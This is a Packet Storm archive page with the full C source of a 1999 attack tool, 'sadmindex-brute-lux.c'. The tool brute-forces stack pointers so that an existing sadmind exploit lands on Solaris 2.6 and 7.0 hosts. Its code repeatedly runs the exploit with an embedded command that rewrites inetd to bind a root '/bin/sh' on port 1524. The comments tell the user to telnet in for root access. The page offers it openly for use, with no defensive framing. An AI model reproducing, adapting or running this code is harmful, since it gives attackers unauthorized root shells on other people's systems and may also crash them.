exploit the possibilities

sadmindex-brute-lux.c

sadmindex-brute-lux.c
Posted Dec 13, 1999
Authored by synnergy, elux

Sadmind exploit stack pointer brute forcer, just ./sadmindex-brute-lux [arch] <host> and it will brute force the stack pointer, it'll output a message on success and open ingreslock (1524) on the remote computer. This brute forcer requires sadmind exploit by Cheez Whiz.

tags | remote, cracker
MD5 | 7588b1cbff18bd6bcdb5fe10b4e85ada

sadmindex-brute-lux.c

Change Mirror Download
// *** Synnergy Networks

// * Description:
//
// sadmind exploit stack pointer brute forcer.

// * Usage:
//
// # gcc -o sadmindex_brute-unix.c -o sadmindex_brute-unix
// # ./sadmindex_brute-unix [arch] <host>

// * Author:
//
// elux (elux@synnergy.net)
// Synnergy Networks (c) 1999, http://www.synnergy.net

// * Comments:
//
// This program is a demanding program since it needs other programs to funtion,
// and that is sadmindex exploit by Cheez Whiz. All it does is try numerous
// stack pointers; -2048 to 2048 the incrementation can be changed by the user,
// default is 4. Think of it this way if you have a 4 incremention you'll be
// connecting to the remote host 1024 times, unless you find the correct sp
// earlier, hence 2048 * 2 / 4 (4 is increment). Once the system finds the sp
// it will print the sp it used to break in and open ingreslock (1524), so just
// telnet to 1524 and your root, can it be any easier? By the way, you might to
// take into consideration that you might DoS the remote host so take it easy.

// *** Synnergy Networks

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

/* *** ATTENTION *** you may have to change some of these *** ATTENTION *** */
#define EXPX86 "sadmindex-x86" /* sadmind exploit for x86 arch */
#define EXPSPARC "sadmindex-sparc" /* sadmind exploit for sparc arch */
#define INC 4 /* sp brute forcing incrementation - 4 should be ok */

/* DON'T change the following */
#define FALSE 0 /* false */
#define TRUE !FALSE /* true */
#define BINDINGRES "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; r\
m -f /tmp/.x;" /* bind rootshell */
#define SPX8626 0x080418ec /* default sadmindex sp for x86 2.6 */
#define SPX867 0x08041798 /* default sadmindex sp for x86 7.0 */
#define SPSPARC26 0xefff9580 /* default sadmindex sp for sparc 2.6 */
#define SPSPARC7 0xefff9418 /* default sadmindex sp for sparc 7.0 */
#define EXPCMDX8626 "./%s -h %s -c \"%s\" -s 0x%x -j 512\n" /* cmd line */
#define EXPCMDX867 "./%s -h %s -c \"%s\" -s 0x%x -j 536\n" /* cmd line */
#define EXPCMDSPARC "./%s -h %s -c \"%s\" -s 0x%x\n" /* cmd line */

int
main(int argc, char **argv)
{
int i, sockfd, fd, size = 4096, sign = -1;
long int addr;
char *buffer = (char *) malloc (size);
struct hostent *he;
struct sockaddr_in their_addr;

if (argc < 3)
{
fprintf(stderr, "\nsadmindex sp brute forcer - by elux\n");
fprintf(stderr, "usage: %s [arch] <host>\n\n", argv[0]);
fprintf(stderr, "\tarch:\n");
fprintf(stderr, "\t1 - x86 Solaris 2.6\n");
fprintf(stderr, "\t2 - x86 Solaris 7.0\n");
fprintf(stderr, "\t3 - SPARC Solaris 2.6\n");
fprintf(stderr, "\t4 - SPARC Solaris 7.0\n\n");
exit(TRUE);
}

if ( (he = gethostbyname(argv[2])) == NULL)
{
printf("Unable to resolve %s\n", argv[2]);
exit(TRUE);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(1524);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8);

if ( (strcmp(argv[1], "1")) == 0)
{
addr = SPX8626;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPX86, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDX8626, EXPX86, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPX86);
exit(TRUE);
}
}
}
else if ( (strcmp(argv[1], "2")) == 0)
{
addr = SPX867;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPX86, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDX867, EXPX86, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPX86);
exit(TRUE);
}
}
}
else if ( (strcmp(argv[1], "3")) == 0)
{
addr = SPSPARC26;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPSPARC, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDSPARC, EXPSPARC, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPSPARC);
exit(TRUE);
}
}
}
else if ( (strcmp(argv[1], "4")) == 0)
{
addr = SPSPARC7;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPSPARC, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDSPARC, EXPSPARC, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPSPARC);
exit(TRUE);
}
}
}
else
printf("%s is not a supported arch, try 1 - 4 ... .. .\n", argv[1]);
}

// EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close